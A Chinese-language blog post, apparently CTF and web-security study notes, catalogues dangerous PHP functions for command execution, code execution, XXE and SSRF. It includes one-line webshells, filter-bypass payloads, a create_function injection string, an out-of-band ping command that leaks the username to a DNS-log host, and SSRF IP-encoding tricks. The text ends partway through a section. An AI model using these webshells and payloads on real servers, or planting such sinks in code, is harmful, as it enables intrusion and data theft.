<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Hexo, NexT">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2">






<meta name="description" content="命令执行system1system(&apos;ls&apos;);  exec1exec(&apos;ls&apos;);  shell_exec ==&amp;gt;``12shell_exec(&apos;ls&apos;);`ls`;  pcntl_exec1pcntl_exec ( string $path [, array $args [, array $envs ]] ) : void   path必须是可执行二进制文件路径或一个在文件第一行指定了">
<meta property="og:type" content="article">
<meta property="og:title" content="php函数总结">
<meta property="og:url" content="http://yoursite.com/2019/10/13/php函数总结/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="命令执行system1system(&apos;ls&apos;);  exec1exec(&apos;ls&apos;);  shell_exec ==&amp;gt;``12shell_exec(&apos;ls&apos;);`ls`;  pcntl_exec1pcntl_exec ( string $path [, array $args [, array $envs ]] ) : void   path必须是可执行二进制文件路径或一个在文件第一行指定了">
<meta property="og:locale" content="zh">
<meta property="og:updated_time" content="2019-10-25T08:14:38.486Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="php函数总结">
<meta name="twitter:description" content="命令执行system1system(&apos;ls&apos;);  exec1exec(&apos;ls&apos;);  shell_exec ==&amp;gt;``12shell_exec(&apos;ls&apos;);`ls`;  pcntl_exec1pcntl_exec ( string $path [, array $args [, array $envs ]] ) : void   path必须是可执行二进制文件路径或一个在文件第一行指定了">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/10/13/php函数总结/">





  <title>php函数总结 | Hexo</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/13/php函数总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">php函数总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-10-13T08:42:43+08:00">
                2019-10-13
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h2><h4 id="system"><a href="#system" class="headerlink" title="system"></a>system</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">system(<span class="string">'ls'</span>);</span><br></pre></td></tr></table></figure>

<h4 id="exec"><a href="#exec" class="headerlink" title="exec"></a>exec</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec(<span class="string">'ls'</span>);</span><br></pre></td></tr></table></figure>

<h4 id="shell-exec-gt"><a href="#shell-exec-gt" class="headerlink" title="shell_exec ==&gt;``"></a>shell_exec ==&gt;``</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">shell_exec(<span class="string">'ls'</span>);</span><br><span class="line">`ls`;</span><br></pre></td></tr></table></figure>

<h4 id="pcntl-exec"><a href="#pcntl-exec" class="headerlink" title="pcntl_exec"></a>pcntl_exec</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pcntl_exec ( string $path [, <span class="keyword">array</span> $args [, <span class="keyword">array</span> $envs ]] ) : void</span><br></pre></td></tr></table></figure>

<p> path必须是可执行二进制文件路径或一个在文件第一行指定了 一个可执行文件路径标头的脚本 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pcntl_exec(&apos;/tmp/shell&apos;)</span><br></pre></td></tr></table></figure>

<h4 id="popen"><a href="#popen" class="headerlink" title="popen"></a>popen</h4><p>popen要配合fgets一起使用 才能输出想要的结果</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$cmd=$_GET[<span class="string">'cmd'</span>];</span><br><span class="line">$a=popen($cmd,<span class="string">'r'</span>);</span><br><span class="line"><span class="keyword">while</span>(!feof($a))&#123;</span><br><span class="line">	<span class="keyword">echo</span> fgets($a);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="proc-open"><a href="#proc-open" class="headerlink" title="proc_open"></a>proc_open</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="passthru"><a href="#passthru" class="headerlink" title="passthru"></a>passthru</h4><p>执行外部程序并显示原始输出</p>
<p> passthru ( string <code>$command</code> [, int <code>&amp;$return_var</code> ] ) : void </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$cmd=$_GET[<span class="string">'cmd'</span>];</span><br><span class="line"><span class="keyword">echo</span> passthru($cmd);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="bypass"><a href="#bypass" class="headerlink" title="bypass"></a>bypass</h3><p>escapeshellcmd escapeshellarg 单引号逃逸</p>
<p>escapeshellcmd原本是 为了防止命令注入的，但是两个连用就会出问题</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1&apos; -v -d a=1 ==&gt; &apos;127.0.0.1&apos;\&apos;&apos; -v -d a=1&apos; escapeshellarg先对单引号进行转义，然后在对左右两端分别加上单引号</span><br><span class="line">&apos;127.0.0.1&apos;\&apos;&apos; -v -d a=1&apos; ==&gt; &apos;127.0.0.1&apos;\\&apos;&apos; -v -d a=1\&apos; escapeshellcmd对\ &apos;进行转义，对\进行转义后，\\就起不到转义的作用了，&apos;&apos;就形成了一个空连接符，字符串末尾的&apos;成为了一个独立的单引号，</span><br><span class="line">所以escapashellcmd会对其进行转义</span><br></pre></td></tr></table></figure>

<h4 id="OOB带外"><a href="#OOB带外" class="headerlink" title="OOB带外"></a>OOB带外</h4><p>linux</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping `whoami`.xxx.xxx.io  <span class="comment">#xxx为ceye的ip</span></span><br></pre></td></tr></table></figure>

<p>windows</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping %USERNAME%.xxx.xxx.io</span><br></pre></td></tr></table></figure>

<h4 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#写入文件</span></span><br><span class="line"><span class="built_in">echo</span> bHM=|base64 &gt; /tmp/shell.sh</span><br><span class="line"><span class="comment">#给权限</span></span><br><span class="line">chmod 777 /tmp/shell.sh</span><br><span class="line"><span class="comment">#执行</span></span><br><span class="line">/tmp/shell.sh</span><br></pre></td></tr></table></figure>

<h4 id="关键字的绕过"><a href="#关键字的绕过" class="headerlink" title="关键字的绕过"></a>关键字的绕过</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">空格 %0a $&#123;IFS&#125; %09 &lt; $IFS$9</span><br><span class="line"></span><br><span class="line">有时候会碰到分割两条命令的情况，可以用; %0a %0d | &amp; %00等</span><br><span class="line"></span><br><span class="line">还可以使用命令续行符\</span><br></pre></td></tr></table></figure>

<p> <code>$9</code>只是当前系统shell进程的第九个参数的持有者，它始终为空字符串! </p>
<h4 id="拼接绕过"><a href="#拼接绕过" class="headerlink" title="拼接绕过"></a>拼接绕过</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a=<span class="string">'sys'</span>;</span><br><span class="line">$b=<span class="string">'tem'</span>;</span><br><span class="line">$a.$b($_GET[<span class="string">'shell'</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>shell拼接</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=l;b=s;$a$b</span><br></pre></td></tr></table></figure>

<h2 id="代码执行"><a href="#代码执行" class="headerlink" title="代码执行"></a>代码执行</h2><h3 id="eval"><a href="#eval" class="headerlink" title="eval"></a>eval</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>($_POST[<span class="string">'shell'</span>]);</span><br></pre></td></tr></table></figure>

<h3 id="assert"><a href="#assert" class="headerlink" title="assert"></a>assert</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">assert($_POST[<span class="string">'shell'</span>]);</span><br></pre></td></tr></table></figure>

<h3 id="preg-replace"><a href="#preg-replace" class="headerlink" title="preg_replace"></a>preg_replace</h3><p>/e修饰符可以导致命令执行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$a=<span class="string">'123'</span>;</span><br><span class="line">preg_replace(<span class="string">'/[0-9]/e'</span>,$_GET[<span class="string">'shell'</span>],$a);</span><br></pre></td></tr></table></figure>

<h3 id="call-user-func"><a href="#call-user-func" class="headerlink" title="call_user_func"></a>call_user_func</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">call_user_func($_GET[<span class="string">'func'</span>],$_GET[<span class="string">'cmd'</span>]);</span><br><span class="line"></span><br><span class="line">func=assert&amp;cmd=phpinfo()</span><br></pre></td></tr></table></figure>

<h3 id="call-user-func-array"><a href="#call-user-func-array" class="headerlink" title="call_user_func_array"></a>call_user_func_array</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">call_user_func_array($_GET[<span class="string">'func'</span>],$_GET[<span class="string">'cmd'</span>]);</span><br><span class="line"></span><br><span class="line">func=assert&amp;cmd[]=phpinfo()</span><br></pre></td></tr></table></figure>

<h3 id="array-map"><a href="#array-map" class="headerlink" title="array_map"></a>array_map</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">array_map($_GET[<span class="string">'func'</span>],$_GET[<span class="string">'cmd'</span>]);</span><br><span class="line"></span><br><span class="line">func=assert&amp;cmd[]=phpinfo()</span><br></pre></td></tr></table></figure>

<h3 id="array-filter"><a href="#array-filter" class="headerlink" title="array_filter"></a>array_filter</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">array_filter($_GET[&apos;code&apos;],$_GET[&apos;func&apos;]);</span><br><span class="line"></span><br><span class="line">?func=assert&amp;code[]=phpinfo();</span><br></pre></td></tr></table></figure>

<h3 id="create-function"><a href="#create-function" class="headerlink" title="create_function"></a>create_function</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">create_function(<span class="string">'$a,$b'</span>,<span class="string">'return 111'</span>)</span><br><span class="line"></span><br><span class="line">==&gt;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">a</span><span class="params">($a, $b)</span></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">111</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>两种注入形式</p>
<h4 id="no-1"><a href="#no-1" class="headerlink" title="no.1"></a>no.1</h4><p>函数体的注入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">create_function($arg,<span class="string">"echo"</span>.$arg);</span><br><span class="line">==&gt;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">name</span><span class="params">($arg)</span></span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> $arg;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>代码注入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$arg=$_GET[<span class="string">'arg'</span>];</span><br><span class="line">$code=<span class="string">"echo hello"</span>.$arg.<span class="string">";"</span>;</span><br><span class="line">$func=create_function(<span class="string">'$arg'</span>, $code);</span><br><span class="line"></span><br><span class="line">==&gt;</span><br><span class="line">    functions name($arg)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"hello"</span>.$arg.<span class="string">";"</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>注入点在函数体内，闭合实际上是闭合的函数体，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="no-2"><a href="#no-2" class="headerlink" title="no.2"></a>no.2</h4><p>函数参数的注入</p>
<p>以一道ctf为例 这个题还需要另一个trick，php的命名空间加上\ 表示绝对路径，不加表示相对</p>
<p>也就是说调用函数也可以\create_function 使用绝对路径的形式调用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$act = @$_GET[<span class="string">'act'</span>];</span><br><span class="line">$arg = @$_GET[<span class="string">'arg'</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">'/^[a-z0-9_]*$/isD'</span>,$act)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'check'</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $act($arg,<span class="string">''</span>);</span><br><span class="line">&#125; </span><br><span class="line">==&gt;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">name</span><span class="params">($arg)</span></span>&#123; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>注入点在参数内，函数体为空，无法在函数体内注入，可以闭合圆括号，构造RCE </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?act=\create_function&amp;arg=)&#123;&#125;;system(&apos;ls&apos;);/*</span><br></pre></td></tr></table></figure>

<h3 id="ob-start"><a href="#ob-start" class="headerlink" title="ob_start"></a>ob_start</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bool ob_start ([ callback $output_callback [, int $chunk_size [, bool $erase ]]] )</span><br></pre></td></tr></table></figure>

<p>此函数将打开输出缓冲。当输出缓冲激活后，脚本将不会输出内容（除http标头外），相反需要输出的内容被存储在内部缓冲区中。</p>
<p>内部缓冲区的内容可以用 ob_get_contents() 函数复制到一个字符串变量中。 想要输出存储在内部缓冲区中的内容，可以使用 ob_end_flush() 函数。另外， 使用 ob_end_clean() 函数会静默丢弃掉缓冲区的内容。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">ob_start(<span class="string">"system"</span>);</span><br><span class="line"><span class="keyword">echo</span> $_GET[<span class="string">'shell'</span>];</span><br><span class="line">ob_end_flush();</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">    </span><br><span class="line">?shell=whoami</span><br></pre></td></tr></table></figure>

<h3 id="usort-uasort"><a href="#usort-uasort" class="headerlink" title="usort/uasort"></a>usort/uasort</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ool usort ( <span class="keyword">array</span> &amp;$array , callable $value_compare_func )</span><br></pre></td></tr></table></figure>

<p>本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序，那么应该使用此函数。</p>
<p>shell_1</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">usort(...$_GET);</span><br><span class="line"></span><br><span class="line">?<span class="number">1</span>[]=test&amp;<span class="number">1</span>[]=phpinfo();&amp;<span class="number">2</span>=assert</span><br></pre></td></tr></table></figure>

<p>shell_2</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">usort($_GET, <span class="string">'asse'</span>.<span class="string">'rt'</span>);</span><br><span class="line"></span><br><span class="line">?<span class="number">1</span>=<span class="number">1</span>+<span class="number">1</span>&amp;<span class="number">2</span>=phpinfo();</span><br></pre></td></tr></table></figure>

<h2 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h2><h3 id="DOMDocument"><a href="#DOMDocument" class="headerlink" title="DOMDocument"></a>DOMDocument</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$data = file_get_contents(<span class="string">'php://input'</span>);</span><br><span class="line"></span><br><span class="line">$dom = <span class="keyword">new</span> DOMDocument();</span><br><span class="line">$dom-&gt;loadXML($data);</span><br><span class="line"></span><br><span class="line">print_r($dom);</span><br></pre></td></tr></table></figure>

<h3 id="SimpleXMLElement"><a href="#SimpleXMLElement" class="headerlink" title="SimpleXMLElement"></a>SimpleXMLElement</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$data = file_get_contents(<span class="string">'php://input'</span>);</span><br><span class="line">$xml = <span class="keyword">new</span> SimpleXMLElement($data);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> $xml-&gt;name;</span><br></pre></td></tr></table></figure>

<h3 id="simplexml-load-string"><a href="#simplexml-load-string" class="headerlink" title="simplexml_load_string"></a>simplexml_load_string</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$data = file_get_contents(<span class="string">'php://input'</span>);</span><br><span class="line">$xml = simplexml_load_string($data);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> $xml-&gt;name;</span><br></pre></td></tr></table></figure>

<h2 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h2><h3 id="curl-exec"><a href="#curl-exec" class="headerlink" title="curl_exec"></a>curl_exec</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">$ch = curl_init(); </span><br><span class="line">curl_setopt($ch, CURLOPT_URL, $_GET[<span class="string">'url'</span>]); </span><br><span class="line">curl_setopt($ch, CURLOPT_HEADER, <span class="number">0</span>); </span><br><span class="line">curl_exec($ch); </span><br><span class="line">curl_close($ch); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents"></a>file_get_contents</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$str=file_get_contents($_GET[<span class="string">'shell'</span>]);</span><br><span class="line"><span class="keyword">echo</span> $str;</span><br><span class="line"></span><br><span class="line">http:<span class="comment">//127.0.0.1/test.php?shell=http://192.168.110.145/index.html</span></span><br></pre></td></tr></table></figure>

<h3 id="fsocksopen"><a href="#fsocksopen" class="headerlink" title="fsocksopen"></a>fsocksopen</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="comment"># 打开连接通道</span></span><br><span class="line">$fp = fsockopen($_GET[<span class="string">'url'</span>], <span class="number">80</span>, $errno, $errstr, <span class="number">30</span>);</span><br><span class="line"><span class="keyword">if</span> (!$fp) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"$errstr ($errno)&lt;br /&gt;\n"</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment"># 通道打开，模拟HTTP请求,http协议标准的换行是\r\n</span></span><br><span class="line">    $out = <span class="string">"GET / HTTP/1.1\r\n"</span>;</span><br><span class="line">    $out .= <span class="string">"Host: 127.0.0.1\r\n"</span>;</span><br><span class="line">    $out .= <span class="string">"Connection: Close\r\n\r\n"</span>;</span><br><span class="line">    <span class="comment"># http模拟完成，发送给服务器</span></span><br><span class="line">    fwrite($fp, $out);</span><br><span class="line">    <span class="comment"># 接受服务器的返回结果</span></span><br><span class="line">    <span class="keyword">while</span> (!feof($fp)) &#123;</span><br><span class="line">        <span class="keyword">echo</span> fgets($fp, <span class="number">128</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    fclose($fp);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"> </span><br><span class="line">http:<span class="comment">//127.0.0.1/test.php?url=192.168.110.145/index.html</span></span><br></pre></td></tr></table></figure>

<h3 id="bypass-1"><a href="#bypass-1" class="headerlink" title="bypass"></a>bypass</h3><h4 id="IP转换"><a href="#IP转换" class="headerlink" title="IP转换"></a>IP转换</h4><p>点分式&lt;==&gt;整数形式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1945097072的十六进制表示是73 EF D3 70，每个字节转换成十进制表示就是115.239.211.112 </span><br><span class="line">115.239.211.112每部分准换成16进制是73 EF D3 70，转换成十进制就是1945097072。</span><br></pre></td></tr></table></figure>

<p>放上两个ip转换的脚本</p>
<p>ip转16进制</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">from</span> binascii <span class="keyword">import</span> hexlify</span><br><span class="line"> </span><br><span class="line">ary=<span class="string">'192.168.1.1'</span></span><br><span class="line">packed_ip_addr = socket.inet_aton(ary)</span><br><span class="line">hexStr=hexlify(packed_ip_addr)</span><br><span class="line">print(<span class="string">'IP:'</span>+str(hexStr))</span><br></pre></td></tr></table></figure>

<p>测试 ok</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /ssrf.php?url=http://0xc0a86e01/neiwang.php HTTP/1.1</span><br></pre></td></tr></table></figure>

<p>ip转整数形式</p>
